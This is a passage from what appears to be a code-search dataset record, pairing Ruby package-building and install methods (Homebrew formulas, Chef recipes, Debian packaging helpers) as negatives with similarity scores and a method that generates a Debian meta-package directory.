"def install_dry_crud\n Dir.chdir(self.class.source_root) do\n Dir.glob(File.join('**', '**')).sort.each do |file_source|\n copy_file_source(file_source) if should_copy?(file_source)\n end\n copy_crud_test_model\n end\n\n readme 'INSTALL'\n end",
"def install\n safe_system \"pax --insecure -rz -f Payload.gz -s ',./bin,#{bin},' -s ',./man,#{man},' -s ',./lib,#{lib},' -s ',./license_gpl_pdftk,#{prefix}/LICENSE,' -s ',./,#{prefix}/README/,'\"\n end",
"def generate_pkg_deps\n shellout!(\"pkgdepend generate -md #{source_dir} #{pkg_manifest_file}.2 | pkgfmt > #{pkg_manifest_file}.3\")\n shellout!(\"pkgmogrify -DARCH=`uname -p` #{pkg_manifest_file}.3 #{transform_file} | pkgfmt > #{pkg_manifest_file}.4\")\n shellout!(\"pkgdepend resolve -m #{pkg_manifest_file}.4\")\n shellout!(\"pkgmogrify #{pkg_manifest_file}.4.res #{versionlock_file} > #{pkg_manifest_file}.5.res\")\n end",
"def install!\n src = package_source\n chk = package_checksum\n windows_package 'Chef Development Kit' do\n source src\n checksum chk\n end\n end",
"def install\n prefix.install Dir[\"*\"] \n end",
"def define\n fail \"Version required (or :noversion)\" if @version.nil?\n @version = nil if :noversion == @version\n\n desc \"Build all the packages\"\n task :package\n\n desc \"Force a rebuild of the package files\"\n task repackage: [:clobber_package, :package]\n\n desc \"Remove package products\"\n task :clobber_package do\n rm_r package_dir rescue nil\n end\n\n task clobber: [:clobber_package]\n\n [\n [need_tar, tgz_file, \"z\"],\n [need_tar_gz, tar_gz_file, \"z\"],\n [need_tar_bz2, tar_bz2_file, \"j\"],\n [need_tar_xz, tar_xz_file, \"J\"]\n ].each do |need, file, flag|\n if need\n task package: [\"#{package_dir}/#{file}\"]\n file \"#{package_dir}/#{file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @tar_command, \"#{flag}cvf\", file, target_dir }\n mv \"#{package_dir_path}/#{target_dir}\", package_dir if without_parent_dir\n end\n end\n end\n\n if need_zip\n task package: [\"#{package_dir}/#{zip_file}\"]\n file \"#{package_dir}/#{zip_file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @zip_command, \"-r\", zip_file, target_dir }\n mv \"#{package_dir_path}/#{zip_file}\", package_dir if without_parent_dir\n end\n end\n\n directory package_dir_path => @package_files do\n @package_files.each do |fn|\n f = File.join(package_dir_path, fn)\n fdir = File.dirname(f)\n mkdir_p(fdir) unless File.exist?(fdir)\n if File.directory?(fn)\n mkdir_p(f)\n else\n rm_f f\n safe_ln(fn, f)\n end\n end\n end\n self\n end",
"def make_install\n run_with_failure_handler(\"cd #{@extracted_path} ; sudo make install\", 'make install')\n end",
"def pkg_install\n return if @install.count == 0\n\n sysprint \"#{@name} install\"\n\n if @install[:bsys_install] != nil\n if @bsdstyle == true\n FileUtils::cd(@srcdir)\n else\n FileUtils::cd(@objdir)\n end\n\n unless sysexec(@install[:bsys_install])\n syserr \"Failed to install package\"\n raise\n end\n\n FileUtils::cd(BSYS_ROOTDIR)\n\n @install.delete(:bsys_install)\n end\n\n @install.each_pair do |src, dst|\n dst = File::join($project_rootdir, dst)\n if File::directory? src\n FileUtils::mkdir_p dst\n continue\n end\n\n # Create directory if it doesn't exists\n FileUtils::mkdir_p dst[0..-(File::basename(dst).length + 1)]\n\n if File::executable? src\n FileUtils::install(src, dst, :mode => 0755)\n else\n FileUtils::install(src, dst, :mode => 0644)\n end\n end\n end",
"def install\n system \"./configure\", \"--disable-debug\",\n \"--disable-dependency-tracking\",\n \"--disable-silent-rules\",\n \"--prefix=#{prefix}\"\n system \"make\", \"install\" \n end",
"def install\n\n system \"cmake\", \".\", *std_cmake_args\n system \"make\", \"install\"\n\n resource(\"flightgear-data\").stage { (prefix/\"fgfs.app\"/\"Contents\"/\"Resources\"/\"data\").install Dir[\"./*\"] }\n \n #if build.with? \"scenery\"\n # resource(\"scenery\").stage { (\n #end\n\n end",
"def install_jaunty_sources\n has_exec(\"apt-get update\", :action => :nothing)\n\n lines =<<-EOF\ndeb http://archive.ubuntu.com/ubuntu/ jaunty main restricted\ndeb http://archive.ubuntu.com/ubuntu/ jaunty universe\ndeb http://archive.ubuntu.com/ubuntu/ jaunty multiverse\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty main restricted\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty universe\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty multiverse\nEOF\n lines.each_line do |l|\n has_line_in_file do \n file \"/etc/apt/sources.list\"\n line l \n notifies get_exec(\"apt-get update\"), :run\n end\n end\n end",
"def install_custom!\n remote_file local_path do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n dpkg_package local_path\n end",
"def generate_all\n copy_template_dir('layouts', 'layouts')\n copy_template_dir('content/bootstrap', 'content/bootstrap')\n copy_template_dir('content/content', 'content/content')\n delete_target_file('lib/default.rb')\n copy_template_dir('lib', 'lib')\n delete_target_file('Rules')\n copy_template_file('Rules', 'Rules')\n copy_template_file('.gitignore', '.gitignore')\n copy_template_file('cg_config.rb', 'cg_config.rb')\n copy_template_file('cg_config.rb_sample', 'cg_config.rb_sample')\n delete_target_file('content/stylesheet.css')\n delete_target_file('content/index.html')\n delete_target_file('layouts/default.html')\n create_empty_dir('content/images')\n end",
"def after_release_email(tag, note, type, selector, options) \n command = \"origen web compile --remote --api\" \n Dir.chdir Origen.root do \n system command \n end \n end",
"def generate_post\n return if @spec.extensions.empty?\n @rpm_post = \"echo \\\"Building native extensions. This could take a while...\\\"\\n\"\n # initialize make command string\n build_cmd = StringIO.new\n # start building make command\n dest_path = File.join @os_install_dir, \"gems\", \"#{name}-#{version}\", @spec.require_paths.first\n ran_rake = false # only run rake once\n\n @spec.extensions.each do |extension|\n break if ran_rake\n\n builder = case extension\n when /extconf/ then\n RGem2Rpm::Ext::ExtConfBuilder\n when /configure/ then\n RGem2Rpm::Ext::ConfigureBuilder\n when /rakefile/i, /mkrf_conf/i then\n ran_rake = true\n RGem2Rpm::Ext::RakeBuilder\n else\n nil\n end\n # get build\n build_cmd << builder.build(extension, dest_path)\n end\n # set rpm no arch to false\n @rpm_no_arch = false\n # return set post install\n @rpm_post = \"#{@rpm_post}#{build_cmd.string}\"\n end",
"def install\n end",
"def build_package\n # Force timestamp to be initialized before anything else. This gives us a\n # stable timestamp for the process.\n timestamp\n # Prepare the work area: copy files from root_path to work_path based on\n # the resolved Manifest.txt.\n prepare_work_area\n # Anything that has been modified locally needs to be reset.\n restore_modified_files\n # Save both the final release metadata and the in-package release metadata.\n save_release_metadata\n # Vendor the dependencies for the package.\n vendor_dependencies\n # Request that supporting plug-ins build the package.\n request_build_package\n end",
"def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)\n options, unknown_options = Kernel.filter_options options,\n :distributions => nil,\n :parallel_build_level => nil\n filepath = build_dir\n # cd package_name\n # tar -xf package_name_0.0.debian.tar.gz\n # tar -xf package_name_0.0.orig.tar.gz\n # mv debian/ package_name_0.0/\n # cd package_name_0.0/\n # debuild -us -uc\n # #to install\n # cd ..\n # sudo dpkg -i package_name_0.0.deb\n Packager.info \"Building #{pkg_name} locally with arguments: pkg_name #{pkg_name},\" \\\n \" debian_pkg_name #{debian_pkg_name},\" \\\n \" versioned_build_dir #{versioned_build_dir}\" \\\n \" deb_filename #{deb_filename}\" \\\n \" options #{options}\"\n\n begin\n FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub(\"/\",\"-\")) do\n if File.exist? \"debian\"\n FileUtils.rm_rf \"debian\"\n end\n if File.exist? versioned_build_dir\n FileUtils.rm_rf versioned_build_dir\n end\n FileUtils.mkdir versioned_build_dir\n\n debian_tar_gz = Dir.glob(\"*.debian.tar.gz\")\n debian_tar_gz.concat Dir.glob(\"*.debian.tar.xz\")\n if debian_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}\"\n else\n debian_tar_gz = debian_tar_gz.first\n cmd = [\"tar\", \"-xf\", debian_tar_gz]\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n orig_tar_gz = Dir.glob(\"*.orig.tar.gz\")\n if orig_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}\"\n else\n orig_tar_gz = orig_tar_gz.first\n cmd = [\"tar\"]\n cmd << \"-x\" << \"--strip-components=1\" <<\n \"-C\" << versioned_build_dir <<\n \"-f\" << orig_tar_gz\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n FileUtils.mv 'debian', versioned_build_dir + '/'\n FileUtils.chdir versioned_build_dir do\n cmd = [\"debuild\", \"-us\", \"-uc\"]\n if options[:parallel_build_level]\n cmd << \"-j#{options[:parallel_build_level]}\"\n end\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd}' failed\"\n end\n end\n\n filepath = Dir.glob(\"*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file generated in #{Dir.pwd}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{Dir.pwd}: #{filepath}\"\n else\n filepath = filepath.first\n end\n end\n rescue Exception => e\n msg = \"Package #{pkg_name} has not been packaged -- #{e}\"\n Packager.error msg\n raise RuntimeError, msg\n end\n filepath\n end",
"def prepare_installation\n InstallOptions.configs = true\n InstallOptions.batch_files = true\n\n ARGV.options do |opts|\n opts.banner = \"Usage: #{File.basename($PROGRAM_NAME)} [options]\"\n opts.separator ''\n opts.on('--[no-]configs', 'Prevents the installation of config files', 'Default off.') do |onconfigs|\n InstallOptions.configs = onconfigs\n end\n opts.on('--destdir[=OPTIONAL]',\n 'Installation prefix for all targets',\n 'Default essentially /') do |destdir|\n InstallOptions.destdir = destdir\n end\n # opts.on('--configdir[=OPTIONAL]', 'Installation directory for config files', 'Default /etc') do |configdir|\n # InstallOptions.configdir = configdir\n # end\n opts.on('--bindir[=OPTIONAL]',\n 'Installation directory for binaries',\n 'overrides RbConfig::CONFIG[\"bindir\"]') do |bindir|\n InstallOptions.bindir = bindir\n end\n opts.on('--ruby[=OPTIONAL]',\n 'Ruby interpreter to use with installation',\n 'overrides ruby used to call install.rb') do |ruby|\n InstallOptions.ruby = ruby\n end\n opts.on('--sitelibdir[=OPTIONAL]',\n 'Installation directory for libraries',\n 'overrides RbConfig::CONFIG[\"sitelibdir\"]') do |sitelibdir|\n InstallOptions.sitelibdir = sitelibdir\n end\n opts.on('--mandir[=OPTIONAL]',\n 'Installation directory for man pages',\n 'overrides RbConfig::CONFIG[\"mandir\"]') do |mandir|\n InstallOptions.mandir = mandir\n end\n opts.on('--full', 'Performs a full installation. All', 'optional installation steps are run.') do |_full|\n InstallOptions.configs = true\n end\n opts.on('--no-batch-files', 'Prevents installation of batch files for windows', 'Default off') do |_batch_files|\n InstallOptions.batch_files = false\n end\n opts.separator('')\n opts.on_tail('--help', 'Shows this help text.') do\n warn opts\n exit\n end\n\n opts.parse!\n end\n\n version = [RbConfig::CONFIG['MAJOR'], RbConfig::CONFIG['MINOR']].join('.')\n libdir = File.join(RbConfig::CONFIG['libdir'], 'ruby', version)\n\n # Mac OS X 10.5 and higher declare bindir\n # /System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/bin\n # which is not generally where people expect executables to be installed\n # These settings are appropriate defaults for all OS X versions.\n RbConfig::CONFIG['bindir'] = '/usr/bin' if RUBY_PLATFORM =~ /^universal-darwin[\\d\\.]+$/\n\n # if InstallOptions.configdir\n # configdir = InstallOptions.configdir\n # elsif windows?\n # path = File.join(File.dirname(__FILE__), \"lib\", \"custom_facts\", \"util\", \"config.rb\")\n # require_relative(path)\n\n # configdir = File.join(LegacyFacter::Util::Config.windows_data_dir, \"PuppetLabs\", \"facter\", \"etc\")\n # else\n # configdir = File.join('/', 'etc', 'puppetlabs', 'facter')\n # end\n\n bindir = InstallOptions.bindir || RbConfig::CONFIG['bindir']\n\n if InstallOptions.sitelibdir\n sitelibdir = InstallOptions.sitelibdir\n else\n sitelibdir = RbConfig::CONFIG['sitelibdir']\n if sitelibdir.nil?\n sitelibdir = $LOAD_PATH.find { |x| x =~ /site_ruby/ }\n if sitelibdir.nil?\n sitelibdir = File.join(libdir, 'site_ruby')\n elsif sitelibdir !~ Regexp.quote(version)\n sitelibdir = File.join(sitelibdir, version)\n end\n end\n end\n\n mandir = InstallOptions.mandir || RbConfig::CONFIG['mandir']\n\n # This is the new way forward\n destdir = InstallOptions.destdir || ''\n\n # configdir = join(destdir, configdir)\n bindir = join(destdir, bindir)\n mandir = join(destdir, mandir)\n sitelibdir = join(destdir, sitelibdir)\n\n # makedirs(configdir) if InstallOptions.configs\n makedirs(bindir)\n makedirs(mandir)\n makedirs(sitelibdir)\n\n InstallOptions.site_dir = sitelibdir\n # InstallOptions.config_dir = configdir\n InstallOptions.bin_dir = bindir\n InstallOptions.lib_dir = libdir\n InstallOptions.man_dir = mandir\n end",
"def install\n yaourt('--noconfirm', '-Sy', @resource[:name])\n end",
"def install\n bin.install \"jsonfilter.sh\" => \"jsonfilter\"\n bin.install \"jsontocsv.py\" => \"jsontocsv\"\n bin.install \"tomltojsonfilter.sh\" => \"tomltojsonfilter\"\n bin.install \"yamltojsonfilter.sh\" => \"yamltojsonfilter\"\n bin.install \"csvtojson.sh\" => \"csvtojson\"\n bin.install \"jsontotomlfilter.sh\" => \"jsontotomlfilter\"\n bin.install \"jsontoyamlfilter.sh\" => \"jsontoyamlfilter\"\n # virtualenv_install_with_resources :using => \"python@3.6\"\n end",
"def install\n # ENV.deparallelize # if your formula fails when building in parallel\n\n # Remove unrecognized options if warned by configure\n #system \"./configure\", \"--disable-debug\",\n #\"--disable-dependency-tracking\",\n #\"--disable-silent-rules\",\n #\"--prefix=#{prefix}\"\n # system \"cmake\", \".\", *std_cmake_args\n #system \"make\", \"install\" # if this fails, try separate make/make install steps\n bin.install \"c9ide\"\n end",
"def install\n cd \"src\" do\n system \"make\"\n bin.install \"mbsum\", \"bucky\"\n end\n pkgshare.install [\"data\", \"scripts\", \"doc\"]\n end",
"def install\n ENV[\"GOPATH\"] = buildpath\n ENV[\"PATH\"] = \"#{ENV[\"PATH\"]}:#{ENV[\"GOPATH\"]}/bin\"\n (buildpath/\"src/github.com/linkerd/namerctl\").install buildpath.children\n cd \"src/github.com/linkerd/namerctl\" do\n system \"go\", \"build\", \"-o\", bin/\"namerctl\"\n prefix.install_metafiles\n end\n end",
"def install\n system \"make\"\n bin.install \"hisat2\", Dir[\"hisat2-*\"]\n doc.install Dir[\"doc/*\"]\n end",
"def pack\n #Throw the postflight script into the Scripts directory\n safe_system(\"sudo #{INSTALL} -m 0755 postflight #{@working_tree['SCRIPT_D']}\")\n safe_system(\"sudo #{INSTALL} -m 0755 Welcome.txt #{@working_tree['RESOURCE_D']}\")\nend",
"def compile\n # setup configurations\n configurations\n\n # Download and untar apache2\n apache2 = download_untar @configuration[\"download_url\"]\n\n # download and untar zlib\n zlib = download_untar @configuration[\"zlib_download_url\"]\n\n @logger.debug\"ZlIB Dir Content: #{Dir[File.join(zlib,\"*\")]}\"\n # configure and compile zlib\n zlib_configure_file = File.join(zlib,\"configure\")\n zlib_install_dir = File.join(@application.cache_dir,\"zlib\")\n\n shell_script = File.join(@application.buildpack_dir,\"resources/shell/compile_zlib.sh\");\n fail \"Shell Script failed\" unless 0 == system(\"./#{shell_script}\")\n # @logger.debug(\"#{zlib_configure_file} --prefix=#{zlib_install_dir}\")\n # result = system(\"#{zlib_configure_file} --prefix=#{zlib_install_dir}\")\n #\n # puts result\n # @logger.debug(\"Configure ZLIB result: #{result[0..-100]}\")\n #\n # # Make zlib\n # @logger.debug(\"make -C #{zlib}\")\n # result = `make -C #{zlib}`\n # puts result\n # @logger.debug(\"Make ZLIB result: #{result[0..-100]}\")\n # @logger.debug(\"make install -C #{zlib}\")\n # result = `make install -C #{zlib}`\n # @logger.debug(\"Make Install Result: #{result[0..-100]}\")\n\n @logger.debug \"Zlib Install Location: #{Dir[File.join(zlib_install_dir,'*')]}\"\n\n end",
"def action_create\n\n install_prerequisites\n\n node.set['pedant'][new_resource.variant]['etc_dir'] = new_resource.config_dir\n\n directory new_resource.config_dir do\n owner new_resource.user\n group new_resource.group\n mode \"0755\"\n recursive true\n end\n\n source_dir = \"#{new_resource.checkout_dir}/#{new_resource.variant}\"\n\n git new_resource.variant do\n destination source_dir\n repository \"git@github.com:opscode/#{new_resource.variant}.git\"\n revision new_resource.revision\n user new_resource.git_user\n end\n\n node.set['pedant'][new_resource.variant]['dir'] = \"/srv/#{new_resource.variant}\"\n\n link node['pedant'][new_resource.variant]['dir'] do\n to source_dir\n end\n\n template \"#{new_resource.config_dir}/pedant_config.rb\" do\n source new_resource.config_template\n owner new_resource.user\n group new_resource.group\n mode \"0644\"\n variables(new_resource.variables)\n end\n\n execute \"bundle install\" do\n cwd node['pedant'][new_resource.variant]['dir']\n # user \"opscode\"\n end\n\nend",
"def install\n bin.install \"#{PACKAGE_NAME}\"\n end",
"def install\n ensure_development_dependency\n template('lib/versioned/version.rb.tt', \"lib/#{namespaced_path}/version.rb\")\n install_bundle\n template('CHANGELOG.md.tt', 'CHANGELOG.md')\n template('CONTRIBUTING.md.tt', 'CONTRIBUTING.md')\n template('RELEASING.md.tt', 'RELEASING.md')\n template('UPGRADING.md.tt', 'UPGRADING.md')\n setup_rspec\n end",
"def install\n system \"cd c; make build\"\n\n bin.install \"c/helloworld\" => \"helloworld-c\"\n end",
"def install!\n include_recipe 'zypper'\n super\n end",
"def build!\n create_output_directory\n spec.source_directories.each { |d| simple_compile_directory(d) }\n compile_files(spec.all_javascript_paths)\n compile_files(spec.all_stylesheet_paths)\n write_manifest\n end",
"def install\n prefix.install Dir[\"*\"]\n end",
"def install\n prefix.install Dir[\"*\"]\n end",
"def common_generator\n if name.to_s.downcase == 'install'\n cp_config\n cp_models\n cp_controllers\n else\n puts 'Try to use: rails g the_banners install'\n end\n end",
"def install(env); end",
"def compile_hiera_files(nodes, clean_export)\n update_compiled_ssh_configs # must come first\n sanity_check(nodes)\n manager.export_nodes(nodes)\n manager.export_secrets(clean_export)\n end",
"def install\n libexec.install \"phyutility.jar\"\n bin.write_jar_script libexec/\"phyutility.jar\", \"phyutility\"\n pkgshare.install \"examples\", \"manual.pdf\"\n end",
"def pre_build\n puts \"pre_build dir=#{`pwd`}\"\n rbvt = RUBY_V\n rbvm = RUBY_V[/^\\d+\\.\\d+/]\n # remove leftovers from previous rake.\n rm_rf \"#{TGT_DIR}/lib\"\n rm_rf \"#{TGT_DIR}/etc\"\n rm_rf \"#{TGT_DIR}/share\"\n rm_rf \"#{TGT_DIR}/conf.d\"\n mkdir_p \"#{TGT_DIR}/lib\"\n cp_r \"#{EXT_RUBY}/lib/ruby\", \"#{TGT_DIR}/lib\"\n # copy include files\n mkdir_p \"#{TGT_DIR}/lib/ruby/include/ruby-#{rbvt}\"\n cp_r \"#{EXT_RUBY}/include/ruby-#{rbvt}/\", \"#{TGT_DIR}/lib/ruby/include\"\n SOLOCS.each_value do |path|\n cp \"#{path}\", \"#{TGT_DIR}\"\n end\n # do some windows things\n mkdir_p \"#{TGT_DIR}/share/glib-2.0/schemas\"\n if APP['GTK'] == \"gtk+-2.0\" \n cp_r\"#{TGT_SYS_DIR}/share/glib-2.0/schemas/gschema.dtd\",\n \"#{TGT_DIR}/share/glib-2.0/schemas\"\n cp_r \"#{ShoesDeps}/share/fontconfig\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/themes\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/xml\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/icons\", \"#{TGT_DIR}/share\"\n elsif APP['GTK'] == \"gtk+-3.0\"\n cp \"#{TGT_SYS_DIR}share/glib-2.0/schemas/gschemas.compiled\" ,\n \"#{TGT_DIR}/share/glib-2.0/schemas\"\n cp_r \"#{ShoesDeps}/share/fontconfig\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/themes\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/xml\", \"#{TGT_DIR}/share\"\n cp_r \"#{ShoesDeps}/share/icons\", \"#{TGT_DIR}/share\"\n else\n cp \"#{TGT_SYS_DIR}share/glib-2.0/schemas/gschemas.compiled\" ,\n \"#{TGT_DIR}/share/glib-2.0/schemas\"\n end\n sh \"#{WINDRES} -I. shoes/appwin32.rc shoes/appwin32.o\"\n cp_r \"#{ShoesDeps}/etc\", TGT_DIR\n mkdir_p \"#{ShoesDeps}/lib\"\n if APP['GTK'] == \"gtk+-3.0\"\n cp_r \"#{ShoesDeps}/lib/gtk-3.0\", \"#{TGT_DIR}/lib\" # shoes, exerb, ruby here\n else\n cp_r \"#{ShoesDeps}/lib/gtk-2.0\", \"#{TGT_DIR}/lib\" # shoes, exerb, ruby here\n end\n bindir = \"#{ShoesDeps}/bin\"\n #cp_r \"#{bindir}/fc-cache.exe\", TGT_DIR\n cp_r \"#{bindir}/gtk-update-icon-cache.exe\", TGT_DIR\n # below for debugging purposes\n if ENV['GDB'] \n cp \"#{bindir}/fc-cat.exe\", TGT_DIR\n cp \"#{bindir}/fc-list.exe\", TGT_DIR\n cp \"#{bindir}/fc-match.exe\", TGT_DIR\n cp \"#{bindir}/fc-pattern.exe\", TGT_DIR\n cp \"#{bindir}/fc-query.exe\", TGT_DIR\n cp \"#{bindir}/fc-scan.exe\", TGT_DIR\n cp \"#{bindir}/fc-validate.exe\", TGT_DIR\n end\n # disable MS Theme\n if !ENABLE_MS_THEME \n Dir.chdir(\"#{TGT_DIR}/share/themes/MS-Windows/gtk-2.0/\") do\n mv 'gtkrc', 'disabled-gtkrc'\n end\n else\n # add our overrides to the MS-Windows theme\n cp \"platform/msw/gtkrc\", \"#{TGT_DIR}/etc/gtk-2.0/\"\n end\n end",
"def install!\n refresh_file_accessors\n prepare_pod_groups\n add_source_files_references\n add_frameworks_bundles\n add_vendored_libraries\n add_resources\n add_developer_files unless sandbox.development_pods.empty?\n link_headers\n end",
"def install\n bin.install \"bin/vh-config\"\n end",
"def install\n for t in CROSS_TARGETS\n mkdir \"#{t}\" do\n system \"../configure\",\n \"--srcdir=../\",\n \"--target=#{t}\",\n \"--prefix=#{prefix}\",\n \"--disable-nls\"\n system \"make\", \"all\", \"ERROR_ON_WARNING=no\"\n system \"make\", \"install\"\n end\n end\n end",
"def install\n\n # --- custom ---\n ENV.prepend_path \"PKG_CONFIG_PATH\", \"/usr/local/lib/pkgconfig/\"\n inreplace \"build/modules.conf.in\", /^codecs/, \"#codecs\"\n\n args = []\n if build.with?(\"freetype\")\n ENV.append_to_cflags \"-I#{Formula[\"freetype\"].opt_include}/freetype2/\"\n else\n args << \"--without-freetype\"\n end\n\n if build.with?(\"lua\")\n ENV.append_to_cflags \"-I#{Formula[\"lua\"].opt_include}/lua/\"\n else\n inreplace \"build/modules.conf.in\", \"languages/mod_lua\",\n \"#languages/mod_lua\"\n end\n\n if build.with?(\"amqp\")\n inreplace \"build/modules.conf.in\", \"#event_handlers/mod_amqp\",\n \"event_handlers/mod_amqp\"\n end\n\n if build.with?(\"shout\")\n inreplace \"build/modules.conf.in\", \"#formats/mod_shout\",\n \"formats/mod_shout\"\n end\n\n if build.with?(\"libyuv\")\n raise \"Building with libyuv is not supported yet\"\n else\n args << \"--disable-libyuv\"\n end\n\n if build.with?(\"libvpx\")\n raise \"Building with libvpx is not supported yet\"\n else\n args << \"--disable-libvpx\"\n end\n\n # --- end of custom ---\n\n ENV[\"ac_cv_lib_lzma_lzma_code\"] = \"no\" # prevent opportunistic linkage to xz\n\n # avoid a dependency on ldns to prevent OpenSSL version conflicts\n inreplace \"build/modules.conf.in\", \"applications/mod_enum\",\n \"#applications/mod_enum\"\n\n system \"./bootstrap.sh\", \"-j\"\n\n # tiff will fail to find OpenGL unless told not to use X\n inreplace \"libs/tiff-4.0.2/configure.gnu\", \"--with-pic\", \"--with-pic --without-x\"\n\n system \"./configure\", \"--disable-dependency-tracking\",\n \"--enable-shared\",\n \"--enable-static\",\n \"--prefix=#{prefix}\",\n \"--exec_prefix=#{prefix}\",\n *args,\n \"LIBS=#{ENV['LIBS']}\",\n \"CFLAGS=#{ENV['CFLAGS']}\",\n \"CXXFLAGS=#{ENV['CFLAGS']}\",\n \"LDFLAGS=#{ENV['LDFLAGS']}\"\n\n system \"make\"\n system \"make\", \"install\", \"all\"\n\n if build.with?(\"moh\")\n # Should be equivalent to: system \"make\", \"cd-moh-install\"\n mkdir_p share/\"freeswitch/sounds/music\"\n [8, 16, 32, 48].each do |n|\n resource(\"sounds-music-#{n}000\").stage do\n cp_r \".\", share/\"freeswitch/sounds/music\"\n end\n end\n end\n\n if build.with?(\"sounds-en\")\n # Should be equivalent to: system \"make\", \"cd-sounds-install\"\n mkdir_p share/\"freeswitch/sounds/en\"\n [8, 16, 32, 48].each do |n|\n resource(\"sounds-en-us-callie-#{n}000\").stage do\n cp_r \".\", share/\"freeswitch/sounds/en\"\n end\n end\n end\n\n if build.with?(\"sounds-fr\")\n # Should be equivalent to: system \"make\", \"cd-sounds-fr-install\"\n mkdir_p share/\"freeswitch/sounds/fr\"\n [8, 16, 32, 48].each do |n|\n resource(\"sounds-fr-ca-june-#{n}000\").stage do\n cp_r \".\", share/\"freeswitch/sounds/fr\"\n end\n end\n end\n\n if build.with?(\"sounds-ru\")\n # Should be equivalent to: system \"make\", \"cd-sounds-ru-install\"\n mkdir_p share/\"freeswitch/sounds/ru\"\n [8, 16, 32, 48].each do |n|\n resource(\"sounds-ru-RU-elena-#{n}000\").stage do\n cp_r \".\", share/\"freeswitch/sounds/ru\"\n end\n end\n end\n end",
"def install\n system \"make\"\n bin.install %w[Catrack DAM2fasta DB2fasta DB2quiva DBdust DBrm DBshow DBsplit DBstats fasta2DAM fasta2DB\n quiva2DB simulator]\n doc.install \"README\"\n end",
"def execute_installation\n #start logging\n set_log_file @options[:log]\n \n download_and_decompress(@options[:prefix], [REDIS_URL, SQLITE3_URL, NGINX_URL])\n \n install_redis if @options[:redis]\n install_sqlite\n configure_nginx @options\n\n install_all_gems\n install_rhoconnect\n \n #remove downloaded tarballs\n cleanup options[:prefix]\n end"
] | [
"0.63612086",
"0.62468463",
"0.62115836",
"0.619243",
"0.6188494",
"0.61588025",
"0.6139201",
"0.6111842",
"0.6008117",
"0.60080624",
"0.60006094",
"0.59659886",
"0.59646237",
"0.5957808",
"0.5957808",
"0.5948403",
"0.59406453",
"0.59402007",
"0.5930946",
"0.59274274",
"0.59237736",
"0.5923281",
"0.59090066",
"0.59039825",
"0.58892065",
"0.5857764",
"0.5837098",
"0.58263344",
"0.5825742",
"0.5803784",
"0.5794561",
"0.578937",
"0.5786718",
"0.57830876",
"0.57805914",
"0.5771427",
"0.5769558",
"0.57629925",
"0.5742863",
"0.5722196",
"0.57108814",
"0.57081497",
"0.5697921",
"0.56857914",
"0.56823605",
"0.5663371",
"0.56601894",
"0.565637",
"0.564519",
"0.5636383",
"0.5628623",
"0.5621094",
"0.56139755",
"0.5606855",
"0.55997515",
"0.55971307",
"0.5596555",
"0.55963874",
"0.5594069",
"0.55919695",
"0.5574937",
"0.55541396",
"0.55528915",
"0.55497926",
"0.55484134",
"0.55463976",
"0.5544823",
"0.5538559",
"0.5537169",
"0.5532093",
"0.55191565",
"0.5509273",
"0.5507101",
"0.5506925",
"0.5505829",
"0.55026656",
"0.5500419",
"0.5491723",
"0.5483195",
"0.54825294",
"0.5476574",
"0.5474395",
"0.54739034",
"0.5471342",
"0.5467108",
"0.54638267",
"0.5461605",
"0.54557246",
"0.54557246",
"0.54526716",
"0.54499674",
"0.54417497",
"0.5435776",
"0.543543",
"0.543504",
"0.5432445",
"0.54294294",
"0.5429143",
"0.5428361",
"0.5425377"
] | 0.62992585 | 1 |
Generate the debian_dir for a meta package i.e. representing a package set or a full release return [String] the main packages directory | def generate_debian_dir_meta(name, depends, base_dir: Dir.pwd, version: "0.1", distribution: nil)
existing_debian_dir = File.join("#{name}-#{version}","debian-meta")
template_dir =
if File.directory?(existing_debian_dir)
existing_debian_dir
else
TEMPLATES_META
end
dir = File.join(base_dir, "debian")
FileUtils.mkdir_p dir
debian_name = debian_meta_name(name)
debian_version = "#{version}"
if distribution
debian_version += '~' + distribution
end
deps_rock_packages = depends
deps_osdeps_packages = []
deps_nonnative_packages = []
Packager.info "Required OS Deps: #{deps_osdeps_packages}"
Packager.info "Required Nonnative Deps: #{deps_nonnative_packages}"
Find.find(template_dir) do |path|
next if File.directory?(path)
template = ERB.new(File.read(path), nil, "%<>", path.gsub(/[^w]/, '_'))
begin
rendered = template.result(binding)
rescue
puts "Error in #{path}:"
raise
end
target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)
FileUtils.mkdir_p File.dirname(target_path)
File.open(target_path, "w") do |io|
io.write(rendered)
end
end
return dir
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
